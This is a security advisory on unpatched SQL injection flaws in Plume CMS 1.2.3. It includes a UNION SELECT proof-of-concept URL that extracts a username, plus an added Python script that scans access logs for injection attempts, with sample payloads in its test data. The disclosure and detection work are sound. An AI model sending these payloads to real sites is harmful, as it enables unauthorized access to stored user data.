
Plume CMS Multiple SQL Injection Vulnerabilities

Sense of Security - Security Advisory - SOS-09-006

Release Date.                  12-Aug-2009
Last Update.                   12-Aug-2009
Vendor Notification Date.      16-Jun-2009
Product.                       Plume CMS
Platform.                      Independent
Affected versions.             1.2.3 (verified), possibly others
Severity Rating.               High
Impact.                        Manipulation of data
Attack Vector.                 Remote with authentication
Solution Status.               Unpatched
CVE reference.                 Not yet allocated

Details.
Plume CMS is a content management system written in PHP. The 
application suffers from SQL injection vulnerabilities in 
index.php and tools.php: it fails to validate data supplied 
in the 'm' variable of index.php before using it in a SQL 
query. The 'id' variable of tools.php is vulnerable to the 
same type of attack.

SQL injection attacks can give an attacker access to backend 
database contents, the ability to remotely execute system 
commands, or in some circumstances the means to take control 
of the operating system hosting the database.

Proof of Concept.
The POC below will return the first username from the users
table:
/plume/manager/index.php?m=1 UNION SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,user_username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL FROM plume_users LIMIT 1,1--

Solution.
None.
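
With no patch available, one stop-gap is to review web server access logs for requests to the two affected scripts whose 'm' or 'id' value is not a plain integer. The following is an added example, not part of the original advisory or of Plume CMS; it assumes both parameters are normally integers (as in m=1 above) and a combined-format access log, and the log lines and the tools.php path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Affected script -> parameter named in the advisory. Scripts are matched by
# file name only; narrow this to your Plume install path if other apps share the host.
WATCHED = {"index.php": "m", "tools.php": "id"}

# Assumption: legitimate values are plain integers (the advisory's PoC starts from m=1).
INTEGER = re.compile(r"\d+")

# Request line of a combined-format log entry. The lazy match tolerates raw
# spaces in the URL. POST bodies are not logged, so only query strings are seen.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed log lines using documentation IP addresses
    '192.0.2.10 - - [12/Aug/2009:10:00:01 +1000] '
    '"GET /plume/manager/index.php?m=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Aug/2009:10:00:05 +1000] '
    '"GET /plume/manager/index.php?m=1%20UNION%20SELECT%20NULL HTTP/1.1" 200 5301',
    '198.51.100.7 - - [12/Aug/2009:10:00:09 +1000] '
    '"GET /plume/manager/tools.php?id=7+UNION+SELECT+NULL HTTP/1.1" 200 4410',
    '192.0.2.10 - - [12/Aug/2009:10:00:12 +1000] '
    '"GET /plume/manager/tools.php?id=7 HTTP/1.1" 200 4388',
]

def suspicious_requests(log_lines):
    """Return (client_ip, script, param, decoded_value) for every request
    whose watched parameter is not a plain integer."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs percent-decodes values and turns '+' into spaces, so
        # encoded and unencoded payloads are compared in the same form.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not INTEGER.fullmatch(value):
                hits.append((line.split(" ", 1)[0], script, param, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Because the attack vector requires authentication, each hit can be correlated with the manager session or account that issued the request.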

Discovered by.
SOS Labs.